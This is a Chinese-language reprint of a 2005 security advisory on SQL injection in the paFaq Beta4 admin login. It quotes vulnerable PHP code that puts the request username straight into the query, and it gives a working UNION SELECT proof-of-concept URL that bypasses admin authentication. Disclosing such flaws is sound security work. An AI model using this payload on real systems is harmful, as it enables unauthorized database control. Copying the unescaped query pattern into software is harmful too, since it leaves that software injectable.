PAFaq管理员用户名SQL注入漏洞

发布日期：2005-06-22
更新日期：2005-06-22

受影响系统：

PHP Arena paFaq Beta4

描述：

---

BUGTRAQ ID: 14003

paFAQ是一款FAQ/知识库系统，允许版主维护FAQ数据库。

paFaq中存在几个SQL注入漏洞，远程攻击者可能利用这些漏洞非授权访问数据库。

如果要利用这些漏洞的话，magic quotes gpc必须处于关闭状态。但magic quotes off是php.ini的默认设置，因此这些漏洞的风险很高，其中最严重的漏洞存在于管理登陆中：

$username = $_REQUEST['username'];
$password = md5($_REQUEST['password']);

$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE
name = '" . $username . "'");
$r = $DB->fetch_row($q);

if ($r['password'] == $password) {

$t = time();
$DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET
session='$t' WHERE id='".$r['id']."'");
setcookie("pafaq_user", $username, time() 3600);
setcookie("pafaq_pass", $password, time() 3600);

变量$username是直接从提交的登陆表单获得的并在查询中执行，因此攻击者可以使用UNION SELECT绕过管理员认证，完全控制数据库系统。

<*来源：James Bercegay （security@gulftech.org）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111928841328681&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://pafaq/admin/index.php?act=login&username=' UNION SELECT id,name,
'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session FROM
pafaq_admins WHERE 1/*&password=foobar

建议：

---

厂商补丁：

PHP Arena
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

www.phparena.net

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有